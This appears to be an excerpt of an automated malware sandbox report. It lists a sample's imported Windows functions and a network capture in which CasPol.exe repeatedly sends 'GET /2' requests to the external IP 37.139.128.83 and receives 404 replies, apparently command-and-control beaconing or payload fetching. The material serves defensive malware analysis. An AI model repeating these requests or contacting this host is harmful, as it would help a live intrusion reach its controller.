USER32.dll | ScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, ShellExecuteExA, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA
ADVAPI32.dll | AdjustTokenPrivileges, RegCreateKeyExA, RegOpenKeyExA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, RegEnumValueA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                    Mar 20, 2023 13:18:53.797794104 CET804981637.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:18:53.798151016 CET4981680192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:18:58.295320034 CET4981680192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:18:58.295567036 CET4981780192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:18:58.314063072 CET804981637.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:18:58.314151049 CET804981737.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:18:58.314477921 CET4981780192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:18:58.314579010 CET4981780192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:18:58.372782946 CET804981737.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:18:58.372881889 CET804981737.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:18:58.372941971 CET804981737.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:18:58.372997999 CET804981737.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:18:58.372993946 CET4981780192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:18:58.372993946 CET4981780192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:18:58.373060942 CET804981737.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:18:58.373205900 CET4981780192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:18:58.373207092 CET4981780192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:03.899411917 CET804981737.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:03.899653912 CET4981780192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:08.386692047 CET4981780192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:08.387037992 CET4981980192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:08.404649019 CET804981737.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:08.404835939 CET804981937.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:08.405142069 CET4981980192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:08.405410051 CET4981980192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:08.439033985 CET804981937.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:08.439058065 CET804981937.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:08.439074993 CET804981937.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:08.439090967 CET804981937.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:08.439105988 CET804981937.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:08.439321995 CET4981980192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:08.439321995 CET4981980192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:13.954207897 CET804981937.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:13.954555035 CET4981980192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:18.446949959 CET4981980192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:18.447367907 CET4982080192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:18.465378046 CET804981937.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:18.465441942 CET804982037.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:18.465748072 CET4982080192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:18.465970039 CET4982080192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:18.525351048 CET804982037.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:18.525393963 CET804982037.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:18.525423050 CET804982037.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:18.525453091 CET804982037.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:18.525480986 CET804982037.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:18.525643110 CET4982080192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:18.525769949 CET4982080192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:24.026876926 CET804982037.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:24.027112007 CET4982080192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:28.539459944 CET4982080192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:28.539709091 CET4982180192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:28.558087111 CET804982037.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:28.558162928 CET804982137.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:28.558506966 CET4982180192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:28.558624983 CET4982180192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:28.602679014 CET804982137.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:28.602756977 CET804982137.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:28.602807999 CET804982137.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:28.602854967 CET804982137.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:28.602905989 CET804982137.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:28.602998018 CET4982180192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:28.602998018 CET4982180192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:28.602998018 CET4982180192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:28.603095055 CET4982180192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:34.110204935 CET804982137.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:34.110419035 CET4982180192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:38.614507914 CET4982180192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:38.614713907 CET4982380192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:38.632922888 CET804982137.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:38.632985115 CET804982337.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:38.633246899 CET4982380192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:38.633337021 CET4982380192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:38.664674044 CET804982337.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:38.664743900 CET804982337.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:38.664789915 CET804982337.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:38.664835930 CET804982337.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:38.664845943 CET4982380192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:38.664896965 CET4982380192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:38.664910078 CET804982337.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:38.664978981 CET4982380192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:38.665150881 CET4982380192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:44.180115938 CET804982337.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:44.180349112 CET4982380192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:48.674999952 CET4982380192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:48.678936958 CET4982480192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:48.693487883 CET804982337.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:48.697426081 CET804982437.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:48.697638035 CET4982480192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:48.697762966 CET4982480192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:48.783301115 CET804982437.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:48.783382893 CET804982437.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:48.783437967 CET804982437.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:48.783482075 CET4982480192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:48.783518076 CET804982437.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:48.783539057 CET4982480192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:48.783611059 CET804982437.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:48.783668041 CET4982480192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:48.783735037 CET4982480192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:48.783792019 CET4982480192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:54.306735039 CET804982437.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:54.307104111 CET4982480192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:58.797430992 CET4982480192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:58.797709942 CET4982580192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:58.815881968 CET804982437.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:58.815943003 CET804982537.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:58.816267967 CET4982580192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:58.816569090 CET4982580192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:58.909148932 CET804982537.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:58.909228086 CET804982537.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:58.909280062 CET804982537.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:58.909333944 CET804982537.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:58.909383059 CET804982537.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:58.909467936 CET4982580192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:58.909467936 CET4982580192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:58.909666061 CET4982580192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:20:04.434014082 CET804982537.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:20:04.434355021 CET4982580192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:20:08.920147896 CET4982580192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:20:08.920535088 CET4982780192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:20:08.938443899 CET804982537.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:20:08.938505888 CET804982737.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:20:08.938694954 CET4982780192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:20:08.938875914 CET4982780192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:20:08.962862968 CET804982737.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:20:08.962925911 CET804982737.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:20:08.962971926 CET804982737.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:20:08.963013887 CET804982737.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:20:08.963059902 CET804982737.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:20:08.963140965 CET4982780192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:20:08.963140965 CET4982780192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:20:08.963210106 CET4982780192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:20:14.464277029 CET804982737.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:20:14.464648008 CET4982780192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:20:18.981542110 CET4982780192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:20:18.981937885 CET4982980192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:20:18.999458075 CET804982737.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:20:18.999727011 CET804982937.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:20:18.999917984 CET4982980192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:20:19.000097990 CET4982980192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:20:19.051856041 CET804982937.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:20:19.051923037 CET804982937.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:20:19.051974058 CET804982937.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:20:19.052016973 CET804982937.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:20:19.052059889 CET804982937.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:20:19.052081108 CET4982980192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:20:19.052082062 CET4982980192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:20:19.052082062 CET4982980192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:20:19.052217960 CET4982980192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:20:24.569574118 CET804982937.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:20:24.569962978 CET4982980192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:20:26.899542093 CET4982980192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:20:26.917967081 CET804982937.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:20:29.057013988 CET4983080192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:20:29.075489044 CET804983037.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:20:29.075661898 CET4983080192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:20:29.075845957 CET4983080192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:20:29.104176044 CET804983037.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:20:29.104244947 CET804983037.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:20:29.104290962 CET804983037.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:20:29.104368925 CET804983037.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:20:29.104403019 CET4983080192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:20:29.104415894 CET804983037.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:20:29.104486942 CET4983080192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:20:29.104532003 CET4983080192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:20:34.616930008 CET804983037.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:20:34.617865086 CET4983080192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:20:39.116533041 CET4983080192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:20:39.120007992 CET4983280192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:20:39.134943962 CET804983037.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:20:39.138489008 CET804983237.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:20:39.138756990 CET4983280192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:20:39.138921976 CET4983280192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:20:39.227524042 CET804983237.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:20:39.227592945 CET804983237.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:20:39.227638960 CET804983237.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:20:39.227682114 CET804983237.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:20:39.227729082 CET804983237.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:20:39.227725983 CET4983280192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:20:39.227799892 CET4983280192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:20:39.227801085 CET4983280192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:20:39.227801085 CET4983280192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:20:39.227941990 CET4983280192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:20:44.725275040 CET804983237.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:20:44.725593090 CET4983280192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:20:49.239451885 CET4983280192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:20:49.239681959 CET4983380192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:20:49.257570982 CET804983237.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:20:49.257591009 CET804983337.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:20:49.257957935 CET4983380192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:20:49.257998943 CET4983380192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:20:49.293009043 CET804983337.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:20:49.293040991 CET804983337.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:20:49.293061972 CET804983337.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:20:49.293082952 CET804983337.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:20:49.293103933 CET804983337.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:20:49.293296099 CET4983380192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:20:54.821466923 CET804983337.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:20:54.821705103 CET4983380192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:20:59.300029039 CET4983380192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:20:59.300364971 CET4983480192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:20:59.318515062 CET804983337.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:20:59.318587065 CET804983437.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:20:59.318790913 CET4983480192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:20:59.318969011 CET4983480192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:20:59.346731901 CET804983437.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:20:59.346787930 CET804983437.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:20:59.346818924 CET804983437.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:20:59.346847057 CET804983437.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:20:59.346941948 CET804983437.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:20:59.347045898 CET4983480192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:20:59.347096920 CET4983480192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:21:04.875719070 CET804983437.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:21:04.876426935 CET4983480192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:21:09.360625029 CET4983480192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:21:09.360910892 CET4983680192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:21:09.378762007 CET804983437.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:21:09.378942013 CET804983637.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:21:09.379074097 CET4983680192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:21:09.379271984 CET4983680192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:21:09.426351070 CET804983637.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:21:09.426366091 CET804983637.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:21:09.426376104 CET804983637.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:21:09.426386118 CET804983637.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:21:09.426542997 CET804983637.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:21:09.426860094 CET4983680192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:21:14.938492060 CET804983637.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:21:14.938873053 CET4983680192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:21:19.435759068 CET4983680192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:21:19.436098099 CET4983780192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:21:19.454015017 CET804983637.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:21:19.454085112 CET804983737.139.128.83192.168.11.20
                                                    • 37.139.128.83
                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    0 | 192.168.11.20 | 49792 | 37.139.128.83 | 80 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Mar 20, 2023 13:16:46.917243958 CET | 158 | OUT | GET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:16:46.943846941 CET | 159 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:16:46 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:16:46.943917990 CET | 159 | IN |
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:16:46.943964958 CET | 160 | IN |
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:16:46.944006920 CET | 160 | IN |
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:16:46.944081068 CET | 160 | IN |
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    1 | 192.168.11.20 | 49795 | 37.139.128.83 | 80 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Mar 20, 2023 13:16:56.982340097 CET | 169 | OUT | GET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:16:57.030054092 CET | 170 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:16:56 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:16:57.030136108 CET | 170 | IN |
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:16:57.030189991 CET | 171 | IN |
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:16:57.030237913 CET | 171 | IN |
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:16:57.030291080 CET | 171 | IN |
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    10 | 192.168.11.20 | 49812 | 37.139.128.83 | 80 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Mar 20, 2023 13:18:28.087193966 CET | 234 | OUT | GET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:18:28.117830992 CET | 234 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:18:28 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:18:28.117913008 CET | 235 | IN |
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:18:28.117969036 CET | 235 | IN |
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:18:28.118019104 CET | 235 | IN |
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:18:28.118074894 CET | 235 | IN |
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    11 | 192.168.11.20 | 49814 | 37.139.128.83 | 80 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Mar 20, 2023 13:18:38.149235964 CET | 243 | OUT | GET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:18:38.178752899 CET | 243 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:18:38 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:18:38.178833008 CET | 244 | IN |
